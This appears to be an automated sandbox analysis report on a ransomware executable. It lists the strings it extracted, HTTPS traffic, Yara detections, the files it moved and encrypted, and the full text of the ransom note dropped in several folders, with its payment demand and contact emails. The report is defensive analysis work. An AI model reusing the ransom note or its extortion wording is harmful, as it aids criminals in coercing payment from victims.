        Source: tsnsd8pOvn.exe, 00000007.00000003.3308255641.00000000097D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.nytimes.com/
        Source: tsnsd8pOvn.exe, 0000000D.00000002.2423749353.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://www.openssl.org/support/faq.html
        Source: tsnsd8pOvn.exe, 00000007.00000003.3308312169.00000000097D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.reddit.com/
        Source: tsnsd8pOvn.exe, 00000007.00000003.3308366967.00000000097D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.twitter.com/
        Source: tsnsd8pOvn.exe, 00000007.00000003.3308419783.00000000097D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.wikipedia.com/
        Source: tsnsd8pOvn.exe, 00000007.00000003.3308505844.00000000097D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.youtube.com/
        Source: V0100005.log.7.drString found in binary or memory: https://M365CDN.nel.measure.office.net/api/report?FrontEnd=AkamaiCDNWorldWide&Destination
        Source: V0100005.log.7.drString found in binary or memory: https://M365CDN.nel.measure.office.net/api/report?FrontEnd=AkamaiCDNWorldWide&DestinationEndpoint=EL
        Source: V01tmp.log.7.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak
        Source: V01tmp.log.7.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms
        Source: V01tmp.log.7.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=wsb
        Source: tsnsd8pOvn.exe, 00000002.00000002.2170674140.00000000006C6000.00000004.00000020.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000008.00000003.2250953642.00000000006EB000.00000004.00000020.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000008.00000002.3368713688.00000000006D7000.00000004.00000020.00020000.00000000.sdmp, tsnsd8pOvn.exe, 0000000B.00000002.2353811966.0000000000958000.00000004.00000020.00020000.00000000.sdmp, tsnsd8pOvn.exe, 0000000D.00000002.2423974600.000000000072A000.00000004.00000020.00020000.00000000.sdmp, tsnsd8pOvn.exe, 0000000D.00000003.2423579315.000000000073E000.00000004.00000020.00020000.00000000.sdmp, tsnsd8pOvn.exe, 0000000D.00000002.2424058932.000000000073F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/
        Source: tsnsd8pOvn.exe, 0000000D.00000002.2423974600.000000000072A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/Root
        Source: tsnsd8pOvn.exe, 00000007.00000002.3368804894.0000000000769000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/g
        Source: tsnsd8pOvn.exe, 0000000D.00000002.2423974600.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, tsnsd8pOvn.exe, 0000000D.00000003.2423579315.0000000000773000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.json
        Source: tsnsd8pOvn.exe, 00000008.00000003.2250953642.00000000006EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.json-z
        Source: tsnsd8pOvn.exe, 0000000D.00000002.2423974600.00000000006E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.json2%
        Source: tsnsd8pOvn.exe, 0000000B.00000002.2353811966.00000000009A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.json7
        Source: tsnsd8pOvn.exe, 0000000D.00000002.2423974600.00000000006E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.json7%
        Source: tsnsd8pOvn.exe, 0000000D.00000002.2423974600.00000000006E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.json9
        Source: tsnsd8pOvn.exe, 0000000D.00000003.2423579315.000000000073E000.00000004.00000020.00020000.00000000.sdmp, tsnsd8pOvn.exe, 0000000D.00000002.2424058932.000000000073F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonBv
        Source: tsnsd8pOvn.exe, 00000002.00000003.2167638377.00000000006F0000.00000004.00000020.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000002.00000003.2167582038.00000000006F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonG
        Source: tsnsd8pOvn.exe, 00000002.00000002.2170674140.0000000000678000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonH
        Source: tsnsd8pOvn.exe, 00000008.00000003.2250953642.00000000006EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonM
        Source: tsnsd8pOvn.exe, 0000000D.00000003.2423579315.000000000073E000.00000004.00000020.00020000.00000000.sdmp, tsnsd8pOvn.exe, 0000000D.00000002.2424058932.000000000073F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonUL
        Source: tsnsd8pOvn.exe, 0000000D.00000002.2423974600.00000000006E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsoni
        Source: tsnsd8pOvn.exe, 00000008.00000003.2250953642.00000000006EB000.00000004.00000020.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000008.00000002.3368713688.00000000006D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonm
        Source: tsnsd8pOvn.exe, 00000008.00000003.2250953642.00000000006EB000.00000004.00000020.00020000.00000000.sdmp, tsnsd8pOvn.exe, 0000000B.00000002.2353811966.0000000000918000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsons
        Source: tsnsd8pOvn.exe, 00000002.00000003.2167638377.00000000006F0000.00000004.00000020.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000002.00000003.2167582038.00000000006F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsontem32
        Source: tsnsd8pOvn.exe, 00000007.00000002.3368804894.0000000000769000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/q
        Source: tsnsd8pOvn.exe, 00000002.00000002.2170674140.00000000006C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/tJ
        Source: V0100005.log.7.dr, V01tmp.log.7.drString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
        Source: prep_foundation_win32_bundle_V8_perf.cache.7.drString found in binary or memory: https://artifacts.dev.azure.com/office/_apis/symbol/symsrv/foundation.win32.js.map/ff6ccdf8f8e6c224f
        Source: prep_ui_win32_bundle_V8_perf.cache.7.drString found in binary or memory: https://artifacts.dev.azure.com/office/_apis/symbol/symsrv/ui.win32.js.map/d6bb35bc608af2672a5b746ba
        Source: excel.exe_Rules.xml.7.drString found in binary or memory: https://autodiscover.com.br/Autodiscover/Autodiscover.xml
        Source: excel.exe_Rules.xml.7.drString found in binary or memory: https://autodiscover.com.br/autodiscover/autodiscover.xml
        Source: excel.exe_Rules.xml.7.drString found in binary or memory: https://autodiscover.com.cn/Autodiscover/Autodiscover.xml
        Source: excel.exe_Rules.xml.7.drString found in binary or memory: https://autodiscover.com.cn/autodiscover/autodiscover.xml
        Source: excel.exe_Rules.xml.7.drString found in binary or memory: https://autodiscover.com/Autodiscover/Autodiscover.xml
        Source: excel.exe_Rules.xml.7.drString found in binary or memory: https://autodiscover.com/autodiscover/autodiscover.xml
        Source: excel.exe_Rules.xml.7.drString found in binary or memory: https://autodiscover.es/Autodiscover/Autodiscover.xml
        Source: excel.exe_Rules.xml.7.drString found in binary or memory: https://autodiscover.es/autodiscover/autodiscover.xml
        Source: excel.exe_Rules.xml.7.drString found in binary or memory: https://autodiscover.fr/Autodiscover/Autodiscover.xml
        Source: excel.exe_Rules.xml.7.drString found in binary or memory: https://autodiscover.fr/autodiscover/autodiscover.xml
        Source: excel.exe_Rules.xml.7.drString found in binary or memory: https://autodiscover.in/Autodiscover/Autodiscover.xml
        Source: excel.exe_Rules.xml.7.drString found in binary or memory: https://autodiscover.in/autodiscover/autodiscover.xml
        Source: excel.exe_Rules.xml.7.drString found in binary or memory: https://autodiscover.it/Autodiscover/Autodiscover.xml
        Source: excel.exe_Rules.xml.7.drString found in binary or memory: https://autodiscover.it/autodiscover/autodiscover.xml
        Source: excel.exe_Rules.xml.7.drString found in binary or memory: https://autodiscover.online/Autodiscover/Autodiscover.xml
        Source: excel.exe_Rules.xml.7.drString found in binary or memory: https://autodiscover.online/autodiscover/autodiscover.xml
        Source: excel.exe_Rules.xml.7.drString found in binary or memory: https://autodiscover.sg/Autodiscover/Autodiscover.xml
        Source: excel.exe_Rules.xml.7.drString found in binary or memory: https://autodiscover.sg/autodiscover/autodiscover.xml
        Source: excel.exe_Rules.xml.7.drString found in binary or memory: https://autodiscover.uk/Autodiscover/Autodiscover.xml
        Source: excel.exe_Rules.xml.7.drString found in binary or memory: https://autodiscover.uk/autodiscover/autodiscover.xml
        Source: excel.exe_Rules.xml.7.drString found in binary or memory: https://autodiscover.xyz/Autodiscover/Autodiscover.xml
        Source: excel.exe_Rules.xml.7.drString found in binary or memory: https://autodiscover.xyz/autodiscover/autodiscover.xml
        Source: wct425E.tmp.7.drString found in binary or memory: https://dc.services.visualstudio.com/v2/track
        Source: V0100005.log.7.dr, V01tmp.log.7.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
        Source: wct425E.tmp.7.drString found in binary or memory: https://g.live.com/1rewlive5skydrive/win81https://g.live.com/1rewlive5skydrive/win8https://g.live.co
        Source: wct425E.tmp.7.drString found in binary or memory: https://g.live.com/odclientsettings/Enterprisehttps://g.live.com/odclientsettings/MsitFasthttps://g.
        Source: prep_foundation_win32_bundle_V8_perf.cache.7.drString found in binary or memory: https://github.com/react-native-async-storage/async-storage/issues
        Source: V0100005.log.7.drString found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2023-10-05-06-30-24/PreSignInSettingsConfig.json?One
        Source: V01tmp.log.7.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/741e3e8c607c445262f3add0e58b18f19e0502af.xml?OneDriveUpdate=7fe112
        Source: prep_foundation_win32_bundle_V8_perf.cache.7.drString found in binary or memory: https://react-native-async-storage.github.io/async-storage/docs/advanced/jest
        Source: V0100005.log.7.drString found in binary or memory: https://res.cdn.officX
        Source: V0100005.log.7.drString found in binary or memory: https://res.cdn.office.ne
        Source: V0100005.log.7.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/ew-preload-inline-2523c8c1505f1172be19.js
        Source: V0100005.log.7.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/otel-logger-104bffe9378b8041455c.js
        Source: V0100005.log.7.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-35de8a913e.css
        Source: V0100005.log.7.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-async-styles.a903b7d0ab82e5bd2f8a.chunk.v7.css
        Source: V0100005.log.7.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bootstrap-5e7af218e953d095fabf.js
        Source: V0100005.log.7.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-3a99f64809c6780df035.js
        Source: V0100005.log.7.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-994d8943fc9264e2f8d3.css
        Source: V0100005.log.7.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-fluent~left-nav-rc.ac5cfbeadfd63fc27ffd.chunk.v7.js
        Source: V0100005.log.7.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-forms-group~mru~officeforms-group-forms~officeforms
        Source: V0100005.log.7.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-left-nav-rc.68ab311bcca4f86f9ef5.chunk.v7.js
        Source: V0100005.log.7.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-mru.2ce72562ad7c0ae7059c.chunk.v7.js
        Source: V0100005.log.7.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendor-bundle-ba2888a24179bf152f3d.js
        Source: V0100005.log.7.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.169ce481376dceef3ef6.chunk.v7.c
        Source: V0100005.log.7.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.b24d6b48aeb44c7b5bf6.chunk.v7.j
        Source: V0100005.log.7.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwaunauth-9d8bc214ac.css
        Source: V0100005.log.7.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedscripts-939520eada.js
        Source: V0100005.log.7.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticstylesfabric-35c34b95e3.css
        Source: V0100005.log.7.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/hero-image-desktop-f6720a4145.jpg
        Source: V0100005.log.7.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/microsoft-365-logo-01d5ecd01a.png
        Source: V0100005.log.7.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-apps-image-46596a6856.png
        Source: V0100005.log.7.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-checkmark-image-1999f0bf81.png
        Source: V0100005.log.7.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/officehome/thirdpartynotice.html
        Source: V0100005.log.7.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_regular.woff2
        Source: V0100005.log.7.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_semibold.woff2
        Source: tsnsd8pOvn.exe, 00000007.00000002.3370588549.00000000030B0000.00000004.00000020.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000008.00000002.3368713688.0000000000748000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://we.tl/t-TVrnNufM
        Source: tsnsd8pOvn.exe, 00000007.00000002.3370588549.00000000030E9000.00000004.00000020.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000007.00000002.3368804894.0000000000806000.00000004.00000020.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000007.00000002.3368804894.000000000080B000.00000004.00000020.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000007.00000002.3368804894.00000000007E6000.00000004.00000020.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000007.00000002.3368804894.00000000007B1000.00000004.00000020.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000008.00000002.3368713688.0000000000726000.00000004.00000020.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000008.00000002.3368713688.0000000000748000.00000004.00000020.00020000.00000000.sdmp, _readme.txt.7.dr, _readme.txt2.7.dr, _readme.txt0.7.dr, _readme.txt1.7.drString found in binary or memory: https://we.tl/t-TVrnNufMGq
        Source: tsnsd8pOvn.exe, 00000007.00000002.3370588549.00000000030B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://we.tl/t-TVrnNufMu
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52638
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52636
        Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 52638 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 52636 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
        Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49711 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49712 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49716 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:52636 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:52638 version: TLS 1.2
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 2_2_004822E0 CreateDCA,CreateCompatibleDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,CreateCompatibleBitmap,SelectObject,GetObjectA,BitBlt,GetBitmapBits,SelectObject,DeleteObject,DeleteDC,DeleteDC,DeleteDC,2_2_004822E0

        Spam, unwanted Advertisements and Ransom Demands

        barindex
        Source: C:\_readme.txtDropped file: ATTENTION!Don't worry, you can return all your files!All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.The only method of recovering files is to purchase decrypt tool and unique key for you.This software will decrypt all your encrypted files.What guarantees you have?You can send one of your encrypted file from your PC and we decrypt it for free.But we can decrypt only 1 file for free. File must not contain valuable information.You can get and look video overview decrypt tool:https://we.tl/t-TVrnNufMGqPrice of private key and decrypt software is $980.Discount 50% available if you contact us first 72 hours, that's price for you is $490.Please note that you'll never restore your data without payment.Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours.To get this software you need write on our e-mail:helpteam@mail.chReserve e-mail address to contact us:helpmanager@airmail.ccYour personal ID:0296Sirj3pNdLH1399769YerBBKCxHURRAqLhaXsGw3Fbkt1Jump to dropped file
        Source: Yara matchFile source: Process Memory Space: tsnsd8pOvn.exe PID: 416, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: tsnsd8pOvn.exe PID: 6408, type: MEMORYSTR
        Source: Yara matchFile source: 10.2.tsnsd8pOvn.exe.22515a0.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 2.2.tsnsd8pOvn.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 13.2.tsnsd8pOvn.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 5.2.tsnsd8pOvn.exe.22015a0.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 13.2.tsnsd8pOvn.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.2.tsnsd8pOvn.exe.22b15a0.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.tsnsd8pOvn.exe.21c15a0.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 8.2.tsnsd8pOvn.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.2.tsnsd8pOvn.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.2.tsnsd8pOvn.exe.22b15a0.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 10.2.tsnsd8pOvn.exe.22515a0.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.tsnsd8pOvn.exe.22115a0.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 2.2.tsnsd8pOvn.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 5.2.tsnsd8pOvn.exe.22015a0.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 8.2.tsnsd8pOvn.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.tsnsd8pOvn.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.tsnsd8pOvn.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.tsnsd8pOvn.exe.21c15a0.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.tsnsd8pOvn.exe.22115a0.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.2.tsnsd8pOvn.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000008.00000002.3368713688.00000000006D7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000002.2423749353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.3368265368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.2413430866.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.2340871565.0000000002250000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000002.2353527786.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.2240840619.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.2214005303.0000000002200000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.3368242009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.2147264748.0000000002210000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: tsnsd8pOvn.exe PID: 5000, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: tsnsd8pOvn.exe PID: 972, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: tsnsd8pOvn.exe PID: 6628, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: tsnsd8pOvn.exe PID: 3180, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: tsnsd8pOvn.exe PID: 416, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: tsnsd8pOvn.exe PID: 6408, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: tsnsd8pOvn.exe PID: 1208, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: tsnsd8pOvn.exe PID: 6292, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: tsnsd8pOvn.exe PID: 6956, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: tsnsd8pOvn.exe PID: 1492, type: MEMORYSTR
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeFile moved: C:\Users\user\Desktop\NEBFQQYWPS\NEBFQQYWPS.docxJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeFile deleted: C:\Users\user\Desktop\NEBFQQYWPS\NEBFQQYWPS.docxJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeFile moved: C:\Users\user\Desktop\BNAGMGSPLO.jpgJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeFile deleted: C:\Users\user\Desktop\BNAGMGSPLO.jpgJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeFile moved: C:\Users\user\Desktop\IPKGELNTQY.xlsxJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeFile dropped: C:\_readme.txt -> decrypt tool and unique key for you.this software will decrypt all your encrypted files.what guarantees you have?you can send one of your encrypted file from your pc and we decrypt it for free.but we can decrypt only 1 file for free. file must not contain valuable information.you can get and look video overview decrypt tool:https://we.tl/t-tvrnnufmgqprice of private key and decrypt software is $980.discount 50% available if you contact us first 72 hours, that's price for you is $490.please note that you'll never restore your data without payment.check your e-mail "spam" or "junk" folder if you don't get answer more than 6 hours.to get this software you need write on our e-mail:helpteam@mail.chreserve e-mail address to contact us:helpmanager@airmail.ccyour personal id:0296sirj3pndlh1399769yerbbkcxhurraqlhaxsgw3fbkt1Jump to dropped file
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeFile dropped: C:\$WinREAgent\_readme.txt -> decrypt tool and unique key for you.this software will decrypt all your encrypted files.what guarantees you have?you can send one of your encrypted file from your pc and we decrypt it for free.but we can decrypt only 1 file for free. file must not contain valuable information.you can get and look video overview decrypt tool:https://we.tl/t-tvrnnufmgqprice of private key and decrypt software is $980.discount 50% available if you contact us first 72 hours, that's price for you is $490.please note that you'll never restore your data without payment.check your e-mail "spam" or "junk" folder if you don't get answer more than 6 hours.to get this software you need write on our e-mail:helpteam@mail.chreserve e-mail address to contact us:helpmanager@airmail.ccyour personal id:0296sirj3pndlh1399769yerbbkcxhurraqlhaxsgw3fbkt1Jump to dropped file
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeFile dropped: C:\$WinREAgent\Scratch\_readme.txt -> decrypt tool and unique key for you.this software will decrypt all your encrypted files.what guarantees you have?you can send one of your encrypted file from your pc and we decrypt it for free.but we can decrypt only 1 file for free. file must not contain valuable information.you can get and look video overview decrypt tool:https://we.tl/t-tvrnnufmgqprice of private key and decrypt software is $980.discount 50% available if you contact us first 72 hours, that's price for you is $490.please note that you'll never restore your data without payment.check your e-mail "spam" or "junk" folder if you don't get answer more than 6 hours.to get this software you need write on our e-mail:helpteam@mail.chreserve e-mail address to contact us:helpmanager@airmail.ccyour personal id:0296sirj3pndlh1399769yerbbkcxhurraqlhaxsgw3fbkt1Jump to dropped file
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeFile dropped: C:\Users\user\_readme.txt -> decrypt tool and unique key for you.this software will decrypt all your encrypted files.what guarantees you have?you can send one of your encrypted file from your pc and we decrypt it for free.but we can decrypt only 1 file for free. file must not contain valuable information.you can get and look video overview decrypt tool:https://we.tl/t-tvrnnufmgqprice of private key and decrypt software is $980.discount 50% available if you contact us first 72 hours, that's price for you is $490.please note that you'll never restore your data without payment.check your e-mail "spam" or "junk" folder if you don't get answer more than 6 hours.to get this software you need write on our e-mail:helpteam@mail.chreserve e-mail address to contact us:helpmanager@airmail.ccyour personal id:0296sirj3pndlh1399769yerbbkcxhurraqlhaxsgw3fbkt1Jump to dropped file
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\LocalState\ThirdPartyNotice.html entropy: 7.99813683887Jump to dropped file
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\Settings\settings.dat entropy: 7.99857750415Jump to dropped file
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\Settings\settings.dat.LOG1 entropy: 7.99780866643Jump to dropped file
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache64.bin entropy: 7.99736752943Jump to dropped file
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\first_party_sets.db entropy: 7.99612049432Jump to dropped file
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\MediaDb.v1.sqlite-shm entropy: 7.99388868447Jump to dropped file
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\PhotosAppTracing_startedInBGMode.etl entropy: 7.99706977892Jump to dropped file
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\TempState\CortanaUnifiedTileModelCache.dat entropy: 7.99486152292Jump to dropped file
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeFile created: C:\Users\user\AppData\Local\Microsoft\input\en-GB\userdict_v1.0809.dat entropy: 7.99125522937Jump to dropped file
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\Settings\settings.dat.LOG2 entropy: 7.99457472683Jump to dropped file
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\StartUnifiedTileModelCache.dat entropy: 7.99591413099Jump to dropped file
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\excel.exe.db entropy: 7.99189983616Jump to dropped file
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeFile created: C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\LocalState\HxCommAlwaysOnLog.etl entropy: 7.99711062743Jump to dropped file
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\officec2rclient.exe.db entropy: 7.99222537094Jump to dropped file
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeFile created: C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\LocalState\HxCommAlwaysOnLog_Old.etl entropy: 7.99748799195Jump to dropped file
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\officeclicktorun.exe.db entropy: 7.99131924207Jump to dropped file
